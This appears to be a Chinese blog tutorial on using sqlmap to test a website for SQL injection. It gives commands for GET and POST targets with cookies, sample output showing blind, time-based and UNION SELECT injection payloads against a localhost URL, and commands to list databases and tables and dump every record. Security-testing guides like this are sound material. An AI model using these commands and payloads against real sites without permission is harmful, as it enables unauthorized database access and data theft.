1. 程式人生 > >使用sqlmap工具測試網站安全性(sql注入等)

使用sqlmap工具測試網站安全性(sql注入等)

sqlmap工具的正常使用依賴python,所以要先安裝python。

python下載地址:https://www.python.org/(下載2.7版本的)

sqlmap下載地址:http://sqlmap.org/

這兩個安裝好之後,把路徑寫入環境變數,便於使用。

1. sql注入檢測

A.【get方式請求的地址】不需要登入時,使用(sqlmap.py -u “測試訪問地址”)即可。

例如:

sqlmap.py -u "localhost:81/goodnews/info?id=64"

B. 【get方式請求的地址】需要登入時,使用(sqlmap.py -u “測試訪問地址”--cookie="從瀏覽器除錯中複製出cookie值"

如果注入成功的話,會顯示注入方法,例如:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=60 AND 4982=4982

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=60 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: id=-8952 UNION ALL SELECT NULL,CONCAT(0x716b787071,0x5467584242446b6d71564e734e4e57484a564f6a6f6c55517444446f58655476496b565172694d74,0x7178766271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZefZ

C. 【post方式請求的地址】需要登入時,使用(sqlmap.py -u “測試訪問地址”--cookie="從瀏覽器除錯中複製出cookie值"  --data="瀏覽器除錯中獲取(如下)")注入;


如上幾種方法,一旦注入成功,那麼接下來就可以獲取資料庫資訊了

sqlmap.py -u “測試訪問地址”--dbs):


更甚者可以獲取所有資料表sqlmap.py -u “測試訪問地址”--tables

還可以獲取所有記錄(sqlmap.py -u “測試訪問地址”--dump);

當然,還有許多其他的命令用法,可以參考sqlmap的文件進行學習。